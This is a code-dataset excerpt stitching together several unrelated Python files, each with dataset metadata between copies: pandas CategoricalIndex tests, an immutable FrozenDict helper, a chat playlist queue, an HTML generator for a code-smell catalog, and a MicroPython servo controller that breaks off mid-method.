u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ',
...
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ',
...
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
if PY3:
expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ',
'さ', 'し', 'す', 'せ', 'そ'],
categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く',
u'け', u'こ', u'さ', u'し', u'す', u'せ', u'そ'],
categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
    def test_fillna_categorical(self):
        """GH 11343: fillna only accepts values that are already present
        in the categories."""
        idx = CategoricalIndex([1.0, np.nan, 3.0, 1.0], name='x')
        # fill by value in categories
        exp = CategoricalIndex([1.0, 1.0, 3.0, 1.0], name='x')
        tm.assert_index_equal(idx.fillna(1.0), exp)
        # fill by value not in categories raises ValueError
        with tm.assert_raises_regex(ValueError,
                                    'fill value must be in categories'):
            idx.fillna(2.0)
    def test_take_fill_value(self):
        """GH 12631: take() — with allow_fill, -1 inserts NaN while the
        categories are preserved; without it, -1 indexes from the end;
        indices below -1 are rejected when filling."""
        # numeric category
        idx = pd.CategoricalIndex([1, 2, 3], name='xxx')
        result = idx.take(np.array([1, 0, -1]))
        expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # fill_value
        result = idx.take(np.array([1, 0, -1]), fill_value=True)
        expected = pd.CategoricalIndex([2, 1, np.nan], categories=[1, 2, 3],
                                       name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # allow_fill=False: -1 means "last element" again
        result = idx.take(np.array([1, 0, -1]), allow_fill=False,
                          fill_value=True)
        expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # object category
        idx = pd.CategoricalIndex(list('CBA'), categories=list('ABC'),
                                  ordered=True, name='xxx')
        result = idx.take(np.array([1, 0, -1]))
        expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
                                       ordered=True, name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # fill_value
        result = idx.take(np.array([1, 0, -1]), fill_value=True)
        expected = pd.CategoricalIndex(['B', 'C', np.nan],
                                       categories=list('ABC'), ordered=True,
                                       name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # allow_fill=False
        result = idx.take(np.array([1, 0, -1]), allow_fill=False,
                          fill_value=True)
        expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
                                       ordered=True, name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # indices below -1 are invalid when filling
        msg = ('When allow_fill=True and fill_value is not None, '
               'all indices must be >= -1')
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -2]), fill_value=True)
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -5]), fill_value=True)
        with pytest.raises(IndexError):
            idx.take(np.array([1, -5]))
    def test_take_fill_value_datetime(self):
        """take() with datetime categories: filling inserts NaT while
        the full original category set is preserved."""
        # datetime category
        idx = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'],
                               name='xxx')
        idx = pd.CategoricalIndex(idx)
        result = idx.take(np.array([1, 0, -1]))
        expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
                                    name='xxx')
        expected = pd.CategoricalIndex(expected)
        tm.assert_index_equal(result, expected)
        # fill_value: NaT fills, categories stay the original three dates
        result = idx.take(np.array([1, 0, -1]), fill_value=True)
        expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', 'NaT'],
                                    name='xxx')
        exp_cats = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'])
        expected = pd.CategoricalIndex(expected, categories=exp_cats)
        tm.assert_index_equal(result, expected)
        # allow_fill=False: -1 indexes from the end again
        result = idx.take(np.array([1, 0, -1]), allow_fill=False,
                          fill_value=True)
        expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
                                    name='xxx')
        expected = pd.CategoricalIndex(expected)
        tm.assert_index_equal(result, expected)
        msg = ('When allow_fill=True and fill_value is not None, '
               'all indices must be >= -1')
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -2]), fill_value=True)
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -5]), fill_value=True)
        with pytest.raises(IndexError):
            idx.take(np.array([1, -5]))
    def test_take_invalid_kwargs(self):
        """take() rejects unknown keyword arguments and the numpy-only
        'out' and 'mode' parameters."""
        idx = pd.CategoricalIndex([1, 2, 3], name='foo')
        indices = [1, 0, -1]
        msg = r"take\(\) got an unexpected keyword argument 'foo'"
        tm.assert_raises_regex(TypeError, msg, idx.take,
                               indices, foo=2)
        msg = "the 'out' parameter is not supported"
        tm.assert_raises_regex(ValueError, msg, idx.take,
                               indices, out=indices)
        msg = "the 'mode' parameter is not supported"
        tm.assert_raises_regex(ValueError, msg, idx.take,
                               indices, mode='clip')
| true | true |
f7328ae4cc169670c4d9df3cd477025254fdd601 | 1,362 | py | Python | python/dazl/prim/map.py | DACH-NY/dazl-client | 56c8b1be047415b2bcb35b6558de4a780a402458 | [
"Apache-2.0"
] | null | null | null | python/dazl/prim/map.py | DACH-NY/dazl-client | 56c8b1be047415b2bcb35b6558de4a780a402458 | [
"Apache-2.0"
] | null | null | null | python/dazl/prim/map.py | DACH-NY/dazl-client | 56c8b1be047415b2bcb35b6558de4a780a402458 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2017-2022 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
__all__ = ["FrozenDict", "to_hashable"]
class FrozenDict(dict):
    """
    An immutable, hashable subclass of ``dict``.

    Every mutating operation raises ``RuntimeError``, so instances are
    safe to use as keys in an ordinary Python dictionary.
    """

    def __hash__(self):
        # A constant hash is legal (equal objects hash equal); dict
        # lookups then discriminate via __eq__.
        return 0

    def _blocked(self, *args, **kwargs):
        # Shared implementation for every mutating dict method.
        raise RuntimeError("frozendicts are immutable")

    __delitem__ = _blocked
    __setitem__ = _blocked
    pop = _blocked
    popitem = _blocked
    setdefault = _blocked
    update = _blocked
    clear = _blocked
def to_hashable(obj):
    """
    Return a hashable equivalent of ``obj``.

    Mappings become :class:`FrozenDict`, non-string collections become
    tuples, and strings and all other values are returned unchanged.
    """
    # Bug fix: Mapping/Collection live in ``collections.abc``; importing
    # them from ``collections`` was deprecated in Python 3.3 and removed
    # in Python 3.10.
    from collections.abc import Collection, Mapping

    if isinstance(obj, Mapping):
        return FrozenDict(obj)
    elif isinstance(obj, str):
        return obj
    elif isinstance(obj, Collection):
        return tuple(obj)
    else:
        return obj
| 27.795918 | 102 | 0.666667 |
__all__ = ["FrozenDict", "to_hashable"]
class FrozenDict(dict):
def __hash__(self):
return 0
def __delitem__(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def __setitem__(self, key, value):
raise RuntimeError("frozendicts are immutable")
def pop(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def popitem(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def setdefault(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def update(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def clear(self, *args, **kwargs):
raise RuntimeError("frozendicts are immutable")
def to_hashable(obj):
from collections import Collection, Mapping
if isinstance(obj, Mapping):
return FrozenDict(obj)
elif isinstance(obj, str):
return obj
elif isinstance(obj, Collection):
return tuple(obj)
else:
return obj
| true | true |
f7328b27c5d39fc42635191efb78c9f2abcabf91 | 824 | py | Python | core/queue.py | Kaneki1416/kenKaneki | cdd59c18b74d559d277b736e5e536884ce4e9499 | [
"MIT"
] | 1 | 2022-01-11T21:59:34.000Z | 2022-01-11T21:59:34.000Z | core/queue.py | Kaneki1416/kenKaneki | cdd59c18b74d559d277b736e5e536884ce4e9499 | [
"MIT"
] | 1 | 2022-01-22T14:40:01.000Z | 2022-01-22T14:40:59.000Z | core/queue.py | Kaneki1416/kenKaneki | cdd59c18b74d559d277b736e5e536884ce4e9499 | [
"MIT"
] | 4 | 2021-11-19T12:45:56.000Z | 2022-02-12T03:28:44.000Z | from typing import Dict, List
class Playlist:
    """Per-chat FIFO queues of track-metadata dictionaries."""

    def __init__(self):
        # chat_id -> ordered list of track-info dicts
        self.__queue: Dict[int, List[Dict[str, str]]] = {}

    def insert_one(self, chat_id: int, data: Dict[str, str]):
        """Append *data* to the chat's queue, creating the queue first
        if this chat has none yet."""
        self.__queue.setdefault(chat_id, []).append(data)

    def delete_one(self, chat_id: int):
        """Pop and return the first queued item, or the sentinel string
        ``"not_in_queue"`` when the chat has no queue."""
        if chat_id in self.__queue:
            return self.__queue[chat_id].pop(0)
        return "not_in_queue"

    def delete_chat(self, chat_id: int):
        """Drop the chat's entire queue; ``"not_in_queue"`` if absent."""
        if chat_id not in self.__queue:
            return "not_in_queue"
        del self.__queue[chat_id]

    def get_queue(self, chat_id: int):
        """Return (without removing) the first queued item for the chat.

        Raises KeyError when the chat has no queue.
        """
        return self.__queue[chat_id][0]

    @property
    def playlists(self):
        """The full mapping of chat ids to their queues."""
        return self.__queue
playlist = Playlist()
| 25.75 | 94 | 0.618932 | from typing import Dict, List
class Playlist:
def __init__(self):
self.__queue: Dict[int, List[Dict[str, str]]] = {}
def insert_one(self, chat_id: int, data: Dict[str, str]):
if chat_id not in self.__queue:
self.__queue[chat_id] = [data]
else:
queue = self.__queue[chat_id]
queue.extend([data])
def delete_one(self, chat_id: int):
return "not_in_queue" if chat_id not in self.__queue else self.__queue[chat_id].pop(0)
def delete_chat(self, chat_id: int):
if chat_id not in self.__queue:
return "not_in_queue"
del self.__queue[chat_id]
def get_queue(self, chat_id: int):
return self.__queue[chat_id][0]
@property
def playlists(self):
return self.__queue
playlist = Playlist()
| true | true |
f7328c285019752a361691904a430d2add9f3a79 | 7,933 | py | Python | smellCatalog/HtmlGenerator.py | neilernst/smells | c093ee72a12f62693d8635359b7ca4958ecba0e0 | [
"MIT"
] | null | null | null | smellCatalog/HtmlGenerator.py | neilernst/smells | c093ee72a12f62693d8635359b7ca4958ecba0e0 | [
"MIT"
] | null | null | null | smellCatalog/HtmlGenerator.py | neilernst/smells | c093ee72a12f62693d8635359b7ca4958ecba0e0 | [
"MIT"
] | 1 | 2019-07-15T14:16:37.000Z | 2019-07-15T14:16:37.000Z | import os
import datetime
import FixedText
class HtmlGenerator(object):
    def __init__(self, output_path, smell_list, category_list):
        """Store the output directory and the smell/category model
        objects the generator will render."""
        self.smell_list = smell_list
        self.out_path = output_path
        self.category_list = category_list
    def generate(self):
        """Generate the whole site: the index page, one page per
        category, and one page per smell."""
        self.generate_index()
        self.generate_categories()
        for smell in self.smell_list:
            self.generate_html(smell)
def generate_categories(self):
for cat in self.category_list:
self.generate_category(cat)
def get_child_categories(self, category):
result = []
for cat in self.category_list:
if (cat.parent_obj == category):
result.append(cat)
return result
    def generate_category(self, category):
        """Write <out_path>/<category.id>.html: a sidebar listing the
        top-level categories, then either this category's
        sub-categories or the smells that belong directly to it."""
        path = os.path.join(self.out_path, category.id + ".html")
        # page skeleton and sidebar with every top-level category
        self.writeFile(path, FixedText.TOP_TEXT)
        self.appendFile(path, FixedText.BODY_TOP_PART)
        self.appendFile(path, FixedText.BODY_INDEX)
        cat_list = sorted(self.category_list, key=lambda cat: cat.name)
        for cat in cat_list:
            if (cat.parent_obj == None):
                text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
                self.appendFile(path, text)
        self.appendFile(path, FixedText.BODY_LOW_PART)
        self.appendFile(path, FixedText.BODY_MAIN_TOP)
        # main body: sub-categories if any exist, otherwise the smells
        # assigned directly to this category
        child_categories = self.get_child_categories(category)
        if (len(child_categories)>0):
            self.appendFile(path, "<h2>(Sub-)Categories</h2>")
            self.appendFile(path, "<ul>")
            for cat in child_categories:
                sub_text = "<li><a href=\"" + cat.id + ".html\"><h4>" + cat.name + "</h4></a></li>"
                self.appendFile(path, sub_text)
            self.appendFile(path, "</ul>")
        else:
            self.appendFile(path, "<h2>" + category.name + "</h2>")
            self.appendFile(path, "<ol>")
            for smell in self.smell_list:
                if (smell.category==category.id):
                    smell_text = "<li><a href=\"" + smell.id + ".html\">" + smell.name + "</a></li>"
                    self.appendFile(path, smell_text)
            self.appendFile(path, "</ol>")
        # footer: home link plus the shared attribution/tracking snippets
        self.appendFile(path, "<hr>")
        self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
        self.appendFile(path, "</div>")
        self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
        self.appendFile(path, FixedText.TRACKING_TEXT)
        self.appendFile(path, FixedText.SOCIAL_TEXT)
        self.appendFile(path, FixedText.HTML_END_TEXT)
    def generate_index(self):
        """Write index.html: sidebar, intro, a nested category list with smell
        counts, the total smell count, and the static footer sections."""
        path = os.path.join(self.out_path, "index.html")
        self.writeFile(path, FixedText.TOP_TEXT)
        self.appendFile(path, FixedText.BODY_TOP_PART)
        self.appendFile(path, FixedText.BODY_INDEX)
        # Sidebar: root categories (no parent) in alphabetical order.
        cat_list = sorted(self.category_list, key=lambda cat: cat.name)
        for cat in cat_list:
            if (cat.parent_obj == None):
                text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
                self.appendFile(path, text)
        self.appendFile(path, FixedText.BODY_LOW_PART)
        self.appendFile(path, FixedText.BODY_MAIN_TOP)
        self.appendFile(path, FixedText.INTRO_TEXT)
        self.appendFile(path, "<ul>")
        # Main list: each root category; parents show no count of their own,
        # leaf categories show their smell count.
        for cat in cat_list:
            if (cat.parent_obj == None):
                if(self.total_sub_categories(cat) > 0 ):
                    text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + "</a></h4></li>"
                else:
                    count = self.get_smell_count_in_category(cat)
                    text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + " (" + str(count) + ")</a></h4></li>"
                self.appendFile(path, text)
                # Nested list of this category's sub-categories with counts.
                self.appendFile(path, "<ul>")
                for subCat in cat_list:
                    if self.is_sub_category(subCat, cat):
                        count = self.get_smell_count_in_category(subCat)
                        sub_text = "<li><h5><a href=\"" + subCat.id + ".html\">" + subCat.name + " (" + str(count) + ")</a></h5></li>"
                        self.appendFile(path, sub_text)
                self.appendFile(path, "</ul>")
        self.appendFile(path, "</ul>")
        total_text = "<p><b>Total documented smells: " + str(len(self.smell_list)) + "</b></p>"
        self.appendFile(path, total_text)
        self.appendFile(path, FixedText.HOW_TEXT)
        self.appendFile(path, FixedText.ADDITIONAL_TEXT)
        self.appendFile(path, FixedText.ACKOWLEDGEMENTS)
        # Stamp the page with the generation date.
        today = datetime.datetime.today()
        self.appendFile(path, "<hr><p>Last updated: " + str(today.strftime("%B %d, %Y")) + "</p>")
        self.appendFile(path, "</div>")
        self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
        self.appendFile(path, FixedText.TRACKING_TEXT)
        self.appendFile(path, FixedText.SOCIAL_TEXT)
        self.appendFile(path, FixedText.HTML_END_TEXT)
def writeFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "w", errors='ignore') as f:
f.write(text)
def appendFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "a", errors='ignore') as f:
f.write(text)
    def generate_html(self, smell):
        """Write <smell.id>.html: the smell's name, description, related
        smells, an optional reference, and a link back to its category."""
        path = os.path.join(self.out_path, smell.id + ".html")
        self.writeFile(path, FixedText.TOP_TEXT)
        self.appendFile(path, FixedText.BODY_TOP_PART)
        self.appendFile(path, FixedText.BODY_INDEX)
        # Sidebar: root categories (no parent) in alphabetical order.
        cat_list = sorted(self.category_list, key=lambda cat: cat.name)
        for cat in cat_list:
            if (cat.parent_obj == None):
                text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
                self.appendFile(path, text)
        self.appendFile(path, FixedText.BODY_LOW_PART)
        self.appendFile(path, FixedText.BODY_MAIN_TOP)
        smell_name = "<h3>" + smell.name + "</h3>"
        self.appendFile(path, smell_name)
        smell_description = "<p>" + smell.description + "</p>"
        self.appendFile(path, smell_description)
        # Cross-links to related ("aka") smells, if any.
        if(len(smell.aka_obj_list)>0):
            aka_text = "<p>Related smells: "
            for aka in smell.aka_obj_list:
                aka_text += "<a href=\"" + aka.id + ".html\">" + aka.name + "</a> "
            aka_text += "</p>"
            self.appendFile(path, aka_text)
        # Optional literature reference; linked when a URL is present.
        if smell.ref_obj != None:
            self.appendFile(path, "<h4>Reference</h4>")
            if smell.ref_obj.url == "":
                self.appendFile(path, "<p>" + smell.ref_obj.text + "</p>")
            else:
                self.appendFile(path, "<p><a href=\"" + smell.ref_obj.url + "\">" + smell.ref_obj.text + "</a></p>")
        self.appendFile(path, "<hr>")
        self.appendFile(path, "<a href=\"" + smell.category_obj.id + ".html\"><h4>" + smell.category_obj.name + "</h4></a>")
        self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
        self.appendFile(path, "</div>")
        # Shared footer fragments.
        self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
        self.appendFile(path, FixedText.TRACKING_TEXT)
        self.appendFile(path, FixedText.SOCIAL_TEXT)
        self.appendFile(path, FixedText.HTML_END_TEXT)
def get_smell_count_in_category(self, cat):
count = 0
for smell in self.smell_list:
if smell.category_obj == cat:
count += 1
return count
def is_sub_category(self, subCat, cat):
if subCat.parent_obj == cat:
return True
return False
def total_sub_categories(self, cat):
count = 0
for category in self.category_list:
if category.parent_obj == cat:
count += 1
return count | 46.122093 | 134 | 0.576201 | import os
import datetime
import FixedText
class HtmlGenerator(object):
def __init__(self, output_path, smell_list, category_list):
self.smell_list = smell_list
self.out_path = output_path
self.category_list = category_list
def generate(self):
self.generate_index()
self.generate_categories()
for smell in self.smell_list:
self.generate_html(smell)
def generate_categories(self):
for cat in self.category_list:
self.generate_category(cat)
def get_child_categories(self, category):
result = []
for cat in self.category_list:
if (cat.parent_obj == category):
result.append(cat)
return result
    def generate_category(self, category):
        """Write <category.id>.html: sidebar plus either the category's
        sub-category list (parents) or its list of smells (leaves)."""
        path = os.path.join(self.out_path, category.id + ".html")
        # writeFile truncates; every later fragment is appended.
        self.writeFile(path, FixedText.TOP_TEXT)
        self.appendFile(path, FixedText.BODY_TOP_PART)
        self.appendFile(path, FixedText.BODY_INDEX)
        # Sidebar: root categories (no parent) in alphabetical order.
        cat_list = sorted(self.category_list, key=lambda cat: cat.name)
        for cat in cat_list:
            if (cat.parent_obj == None):
                text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
                self.appendFile(path, text)
        self.appendFile(path, FixedText.BODY_LOW_PART)
        self.appendFile(path, FixedText.BODY_MAIN_TOP)
        child_categories = self.get_child_categories(category)
        if (len(child_categories)>0):
            # Parent category: link to its sub-categories ...
            self.appendFile(path, "<h2>(Sub-)Categories</h2>")
            self.appendFile(path, "<ul>")
            for cat in child_categories:
                sub_text = "<li><a href=\"" + cat.id + ".html\"><h4>" + cat.name + "</h4></a></li>"
                self.appendFile(path, sub_text)
            self.appendFile(path, "</ul>")
        else:
            # ... leaf category: ordered list of its smells.
            self.appendFile(path, "<h2>" + category.name + "</h2>")
            self.appendFile(path, "<ol>")
            for smell in self.smell_list:
                # NOTE(review): compares the id string here, while the count
                # helpers compare category_obj — presumably equivalent; verify.
                if (smell.category==category.id):
                    smell_text = "<li><a href=\"" + smell.id + ".html\">" + smell.name + "</a></li>"
                    self.appendFile(path, smell_text)
            self.appendFile(path, "</ol>")
        self.appendFile(path, "<hr>")
        self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
        self.appendFile(path, "</div>")
        # Shared footer fragments.
        self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
        self.appendFile(path, FixedText.TRACKING_TEXT)
        self.appendFile(path, FixedText.SOCIAL_TEXT)
        self.appendFile(path, FixedText.HTML_END_TEXT)
    def generate_index(self):
        """Write index.html: sidebar, intro, nested category list with smell
        counts, the total smell count, and static footer sections."""
        path = os.path.join(self.out_path, "index.html")
        self.writeFile(path, FixedText.TOP_TEXT)
        self.appendFile(path, FixedText.BODY_TOP_PART)
        self.appendFile(path, FixedText.BODY_INDEX)
        # Sidebar: root categories (no parent) in alphabetical order.
        cat_list = sorted(self.category_list, key=lambda cat: cat.name)
        for cat in cat_list:
            if (cat.parent_obj == None):
                text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
                self.appendFile(path, text)
        self.appendFile(path, FixedText.BODY_LOW_PART)
        self.appendFile(path, FixedText.BODY_MAIN_TOP)
        self.appendFile(path, FixedText.INTRO_TEXT)
        self.appendFile(path, "<ul>")
        # Main list: each root category; parents show no count of their own,
        # leaf categories show their smell count.
        for cat in cat_list:
            if (cat.parent_obj == None):
                if(self.total_sub_categories(cat) > 0 ):
                    text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + "</a></h4></li>"
                else:
                    count = self.get_smell_count_in_category(cat)
                    text = "<li><h4><a href=\"" + cat.id + ".html\">" + cat.name + " (" + str(count) + ")</a></h4></li>"
                self.appendFile(path, text)
                # Nested list of this category's sub-categories with counts.
                self.appendFile(path, "<ul>")
                for subCat in cat_list:
                    if self.is_sub_category(subCat, cat):
                        count = self.get_smell_count_in_category(subCat)
                        sub_text = "<li><h5><a href=\"" + subCat.id + ".html\">" + subCat.name + " (" + str(count) + ")</a></h5></li>"
                        self.appendFile(path, sub_text)
                self.appendFile(path, "</ul>")
        self.appendFile(path, "</ul>")
        total_text = "<p><b>Total documented smells: " + str(len(self.smell_list)) + "</b></p>"
        self.appendFile(path, total_text)
        self.appendFile(path, FixedText.HOW_TEXT)
        self.appendFile(path, FixedText.ADDITIONAL_TEXT)
        self.appendFile(path, FixedText.ACKOWLEDGEMENTS)
        # Stamp the page with the generation date.
        today = datetime.datetime.today()
        self.appendFile(path, "<hr><p>Last updated: " + str(today.strftime("%B %d, %Y")) + "</p>")
        self.appendFile(path, "</div>")
        self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
        self.appendFile(path, FixedText.TRACKING_TEXT)
        self.appendFile(path, FixedText.SOCIAL_TEXT)
        self.appendFile(path, FixedText.HTML_END_TEXT)
def writeFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "w", errors='ignore') as f:
f.write(text)
def appendFile(self, fileName, text):
file = os.path.abspath(fileName)
with open(file, "a", errors='ignore') as f:
f.write(text)
    def generate_html(self, smell):
        """Write <smell.id>.html: name, description, related smells, optional
        reference, and a link back to the smell's category."""
        path = os.path.join(self.out_path, smell.id + ".html")
        self.writeFile(path, FixedText.TOP_TEXT)
        self.appendFile(path, FixedText.BODY_TOP_PART)
        self.appendFile(path, FixedText.BODY_INDEX)
        # Sidebar: root categories (no parent) in alphabetical order.
        cat_list = sorted(self.category_list, key=lambda cat: cat.name)
        for cat in cat_list:
            if (cat.parent_obj == None):
                text = "<a href=\"" + cat.id + ".html\" class=\"w3-bar-item w3-button w3-hover-white\">" + cat.name + "</a>"
                self.appendFile(path, text)
        self.appendFile(path, FixedText.BODY_LOW_PART)
        self.appendFile(path, FixedText.BODY_MAIN_TOP)
        smell_name = "<h3>" + smell.name + "</h3>"
        self.appendFile(path, smell_name)
        smell_description = "<p>" + smell.description + "</p>"
        self.appendFile(path, smell_description)
        # Cross-links to related ("aka") smells, if any.
        if(len(smell.aka_obj_list)>0):
            aka_text = "<p>Related smells: "
            for aka in smell.aka_obj_list:
                aka_text += "<a href=\"" + aka.id + ".html\">" + aka.name + "</a> "
            aka_text += "</p>"
            self.appendFile(path, aka_text)
        # Optional literature reference; linked when a URL is present.
        if smell.ref_obj != None:
            self.appendFile(path, "<h4>Reference</h4>")
            if smell.ref_obj.url == "":
                self.appendFile(path, "<p>" + smell.ref_obj.text + "</p>")
            else:
                self.appendFile(path, "<p><a href=\"" + smell.ref_obj.url + "\">" + smell.ref_obj.text + "</a></p>")
        self.appendFile(path, "<hr>")
        self.appendFile(path, "<a href=\"" + smell.category_obj.id + ".html\"><h4>" + smell.category_obj.name + "</h4></a>")
        self.appendFile(path, "<a href=\"index.html\"><h3>Home</h3></a>")
        self.appendFile(path, "</div>")
        # Shared footer fragments.
        self.appendFile(path, FixedText.ATTRIBUTION_TEXT)
        self.appendFile(path, FixedText.TRACKING_TEXT)
        self.appendFile(path, FixedText.SOCIAL_TEXT)
        self.appendFile(path, FixedText.HTML_END_TEXT)
def get_smell_count_in_category(self, cat):
count = 0
for smell in self.smell_list:
if smell.category_obj == cat:
count += 1
return count
def is_sub_category(self, subCat, cat):
if subCat.parent_obj == cat:
return True
return False
def total_sub_categories(self, cat):
count = 0
for category in self.category_list:
if category.parent_obj == cat:
count += 1
return count | true | true |
f7328d27708be173337c84cd136370e78d9f3791 | 1,827 | py | Python | controller/test5_hw_test/rotate_axis.py | drummonds/od-robot | a74954aefecb49654686dc0539ea23cb915c6f4d | [
"MIT"
] | null | null | null | controller/test5_hw_test/rotate_axis.py | drummonds/od-robot | a74954aefecb49654686dc0539ea23cb915c6f4d | [
"MIT"
] | null | null | null | controller/test5_hw_test/rotate_axis.py | drummonds/od-robot | a74954aefecb49654686dc0539ea23cb915c6f4d | [
"MIT"
] | null | null | null | from machine import Pin, PWM
import pycom
import time
class Rotate:
    """Rotation-axis servo on pin G13, driven through a shared PWM timer.

    Positions are percentages (0-100) mapped onto duty cycles between 1/20
    and 2/20 of the PWM frame — standard 1-2 ms servo pulses, assuming the
    shared timer runs a 20 ms (50 Hz) frame; confirm the timer setup.
    """
    def __init__(self, pwm):
        # Assumes the shared PWM timer is already set up and is reused here;
        # the 1/20 duty factors below imply a 20 ms servo frame.
        self.pwm = pwm
        self.is_active = False  # PWM channel not claimed yet
        self.at_position = 50   # last commanded position, in percent
    def run(self):
        # No periodic housekeeping needed for this axis.
        pass
    def state_text(self):
        # One-line status for debugging/telemetry.
        return 'Rotate position = {}'.format(self.at_position)
    def activate(self, start_dc=0.15):
        # May not be switched on yet: lazily claim PWM channel 2 on G13.
        if not self.is_active:
            self.is_active = True
            self.pwm_c = self.pwm.channel(2, pin='G13', duty_cycle=start_dc)
    def set_position(self, position): # Converts % to 1-2 ms pulses
        self.at_position = position
        # position in % -> duty cycle in [1/20, 2/20] of the PWM frame
        dc = (position / 100.0) * (1/20) + (1/20)
        self.activate(start_dc=dc)
        self.pwm_c.duty_cycle(dc)
        return dc
    def wait_set_position(self, position):
        """Rotates and waits until rotate gets there. Guess time from
        assuming a constant rotation speed"""
        full_rotate_time = 3000 # ms for a full 0-100% sweep
        # Estimate of travel time at constant speed.
        time_estimate = full_rotate_time * abs(self.at_position - position) / 100
        # Allow for creep which can take a minimum time
        # NOTE(review): min() *caps* the wait at 1500 ms, while the comment
        # above suggests enforcing a floor (which would be max()).  Confirm
        # which is intended before relying on long moves completing in time.
        if self.at_position - position != 0:
            time_estimate = min(int(time_estimate), 1500)
        self.set_position(position)
        time.sleep_ms(int(time_estimate))
    def shutdown(self):
        # Ideally won't move the servo: release G13 as a pulled-up input.
        self.pwm_off = Pin('G13', mode=Pin.IN, pull=Pin.PULL_UP)
        self.is_active = False
    def in_bin(self):
        # Preset: rotate over the bin.
        self.wait_set_position(86)
    def out_bin(self):
        # Preset: rotate away from the bin, approached in two small steps.
        self.wait_set_position(12) # min diff seems to be 2
        self.wait_set_position(14)
    def dvd(self):
        # Preset: rotate over the DVD position.
        self.wait_set_position(50)
| 30.966102 | 81 | 0.621237 | from machine import Pin, PWM
import pycom
import time
class Rotate:
    """Rotation-axis servo on pin G13 driven from a shared PWM timer.

    Positions are percentages (0-100) translated into duty cycles between
    1/20 and 2/20 of the PWM frame (standard 1-2 ms servo pulses).
    """
    def __init__(self, pwm):
        self.pwm = pwm
        self.is_active = False
        self.at_position = 50
    def run(self):
        """No periodic work is required for this axis."""
        pass
    def state_text(self):
        """Human-readable one-line status."""
        return 'Rotate position = {}'.format(self.at_position)
    def activate(self, start_dc=0.15):
